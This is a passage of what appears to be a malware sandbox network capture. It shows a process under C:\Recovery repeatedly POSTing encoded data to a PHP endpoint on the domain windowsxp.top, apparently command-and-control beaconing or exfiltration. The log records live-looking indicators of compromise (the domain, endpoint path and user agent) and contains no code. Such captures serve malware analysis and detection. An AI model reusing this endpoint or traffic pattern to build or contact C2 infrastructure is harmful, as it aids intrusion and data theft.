                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KktnIFEqxNa%2Bro5r%2BxJlJrylt1V0cs0jIImdDaxkSSQcA338OmBUn9oQ9NGHP4nD7P4BMyyZBuKORo3ePZqSxoXat0rGcLZ%2BPqG75JB45TTriQp%2FG%2BgKVkfACSv7H0yD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b84409d4e9b5-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1564&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=925239&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  78 | 192.168.2.4 | 50091 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:53.354190111 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:53.711872101 CET | 1008 | OUT | Data Raw: 55 56 58 5d 5e 5c 53 50 54 58 57 54 54 55 5b 5e 59 5a 5b 5f 52 55 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVX]^\SPTXWTTU[^YZ[_RUR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1X/5&58]-X%(/=$S)/;#"'/><>*^.?!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:53.977998018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:54.267026901 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCxa9F6nHQYDvHBLC2OYNfOKoW71K341q6psVOt3C52wDjvT3HDxQWR7TMNts0lfs6P2xzSKk%2F3tyg%2FxeFYfe0YOoqBPdOqmdf8Qy7NNJxYzBUx7n3oZ0AUUF9j0nr%2FD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b849cdf94768-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1066&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1377735&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 50092 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:54.433525085 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:54.853442907 CET | 1012 | OUT | Data Raw: 55 50 58 5e 5b 58 53 54 54 58 57 54 54 50 5b 53 59 58 5b 50 52 54 52 5b 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPX^[XSTTXWTTP[SYX[PRTR[T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$20_55"5(9$'(8-$U*,+#2$8.7Y)9:!Y##X(7
Oct 27, 2024 19:23:55.243628025 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:55.243840933 CET | 779 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SIxtT7pO%2FQJ6v7RTm%2BmsZFsskuEAGwq56tC2IYXa1Y6MYNztCPbNitf%2FTpEiLyVxMZJ4rLAQWB8PYJO531eBpjZ%2BOdFBst9PjCj8TTFr712Ifnv5DA%2Bri5xCO%2F6%2BiwmF"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8508dbc0bdd-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2160&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=678537&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 50093 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:55.472805977 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:55.821430922 CET | 1012 | OUT | Data Raw: 55 54 58 5a 5b 58 56 57 54 58 57 54 54 54 5b 5c 59 5c 5b 50 52 50 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UTXZ[XVWTXWTTT[\Y\[PRPRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y&X,_5*&!(\.%8;X'> #"<84**_,/!Y##X('
Oct 27, 2024 19:23:56.062069893 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:56.272614956 CET | 774 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HLzB6%2FLg0%2Fth1GUyStNS8Z7kqkIpRfBTFW5AqybwdrTHT8Aiwwincb%2B6sFCZ5rl4OAS1UqKqcFSq%2FpL00GG4jW4wWQnZJlin59B8aNq16JTnJxKI4C1FwOM4IFrnOflJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8570e3a6c79-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1187&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1256944&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.4 | 50094 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:56.171577930 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:56.526910067 CET | 1716 | OUT | Data Raw: 55 55 58 5b 5e 5a 56 53 54 58 57 54 54 56 5b 5d 59 51 5b 51 52 5e 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UUX[^ZVSTXWTTV[]YQ[QR^RRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&X#6:)"[9$(\08$T8,=< P#2(/>+^?<:!Y##X(/
Oct 27, 2024 19:23:56.784327984 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:56.992614031 CET | 923 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AANsrmhwE2j%2F4W7N5smxWKImGnQWUHmubW03Bva2H09RpkmjYd5rMxGcSED7Leny6x9uV0m8k9e4%2Fw1tzqgQdaDpa15q3OO1D%2Fnw7Fj7N%2FcuERvBgAwfS9oZVVLtIBOZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b85b88cc2ccb-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1330&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1114703&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 17 20 3e 06 1f 29 12 3d 1c 3e 1f 21 5e 24 2c 0c 04 38 32 2f 00 29 13 3d 1d 2f 28 08 54 27 0a 21 45 3c 3a 3c 5a 20 10 05 0d 29 1f 21 5e 00 1c 27 19 21 10 29 14 25 2b 23 07 30 30 28 5c 35 13 33 15 2a 3e 21 1f 3f 5f 38 5a 28 06 20 08 2c 3f 0b 54 26 00 3d 00 38 28 0f 06 3c 2a 2a 54 0c 14 21 5b 2d 2c 3c 59 35 57 22 0a 3d 0b 2b 04 30 3e 01 09 27 3a 23 0f 3f 3c 06 06 3c 2d 21 1f 21 12 24 5a 2a 28 26 5f 25 3d 05 13 29 14 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98" >)=>!^$,82/)=/(T'!E<:<Z )!^'!)%+#00(\53*>!?_8Z( ,?T&=8(<**T![-,<Y5W"=+0>':#?<<-!!$Z*(&_%=)"T")S0YP0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.4 | 50095 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:56.421049118 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:56.774324894 CET | 1012 | OUT | Data Raw: 55 56 58 5b 5e 5e 56 55 54 58 57 54 54 5d 5b 5c 59 51 5b 5b 52 5f 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVX[^^VUTXWTT][\YQ[[R_RRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']2>^"95 Z97$<P/ S=/7 (8*<:_9/!Y##X(
Oct 27, 2024 19:23:57.016601086 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:57.338340998 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YqgRH0ry7hiZHhIJ5bDDxgiBYS9fhtGfdYwekSLvOs4YBG2HJf0Q9%2FwvpKXu5BW1RTD2sjpiJH7N9pLcMCpmkQezik8%2BhM%2FaoWATh3QnnEgsPACyNRY7KqS7VNz6WwFl"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b85cf806e81f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1148&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1300988&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.4 | 50096 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:57.469248056 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:57.825076103 CET | 1012 | OUT | Data Raw: 50 50 58 55 5e 5b 56 56 54 58 57 54 54 51 5b 5e 59 5f 5b 5e 52 56 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXU^[VVTXWTTQ[^Y_[^RVRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z2>(^5)]66$,$ $(/.(W*<;7!</Y?<9.!Y##X(3
Oct 27, 2024 19:23:58.295233011 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:58.502199888 CET | 779 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QL1q1eFSYp%2Bb5zm63jCQu%2BcY%2BaUOdSp%2BJtr4b9oUbqXHYPixA%2Bzzd6foLYs%2BATa0BGPSbh1PzXgHXFVuY9zgpqILwn7LrC7q2az%2BaoEdHNR5jqxllCRLKTS1aoeE4lh"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b864fd3745fc-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1619&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=863446&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.4 | 50097 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:58.648310900 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:58.998785019 CET | 1012 | OUT | Data Raw: 55 55 5d 5b 5e 5a 53 50 54 58 57 54 54 5d 5b 5f 59 5a 5b 5d 52 51 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UU][^ZSPTXWTT][_YZ[]RQRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\1>35))X!P$]-'8V;7><<V"1/-=3Z=!./!Y##X(
Oct 27, 2024 19:23:59.262715101 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:59.456310987 CET | 776 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxaw4y8IST0JHDiWx%2FAQ1h06XmSMjyr%2FdkwgmytiATYAZvKaua%2F%2BeSIEhRrPwhEFEi9gW0jOne5hQk3SOOM3NFwy2LGp1ADHfDaTfv95hZ4RSS3agjswXi9HTFL%2BXka2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b86affa8e922-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1368&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1019000&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.4 | 50098 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:00.707062006 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: windowsxp.top
Content-Length: 1000
Expect: 100-continue
Oct 27, 2024 19:24:01.055872917 CET | 1000 | OUT | Data Raw: 50 56 5d 5b 5b 5e 56 50 54 58 57 54 54 55 5b 5a 59 5d 5b 5f 52 52 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PV][[^VPTXWTTU[ZY][_RRR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'[%> :"&7- X33-=$(<+4;^/=^>?6Y:!Y##X(7
Oct 27, 2024 19:24:01.318418980 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:01.514388084 CET | 776 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2BvW%2B7ElRey9Xlq8CWnsJ1KZYejACV3bvuKNvfXS7zj4U0UtBwcb%2FalQVQgiSpiysaA2edSC9FOHJBt9J8TnjNfSMqF%2B%2BmkCwhizEhqJ2VUKB39mO4n%2F5Ub%2BfXaRJ%2Fyk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b877d82c4762-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1790&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1321&delivery_rate=822260&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
Oct 27, 2024 19:24:01.514415979 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.4 | 50099 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:01.647578955 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: windowsxp.top
Content-Length: 1012
Expect: 100-continue
Oct 27, 2024 19:24:02.007833004 CET | 1012 | OUT | Data Raw: 50 52 5d 5e 5e 53 56 5f 54 58 57 54 54 50 5b 52 59 5b 5b 50 52 51 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PR]^^SV_TXWTTP[RY[[PRQRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z&><6\=!&,\:03 W8-#=<"!'/7_)Z6.!Y##X(7
Oct 27, 2024 19:24:02.248322010 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:02.444952011 CET | 769 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
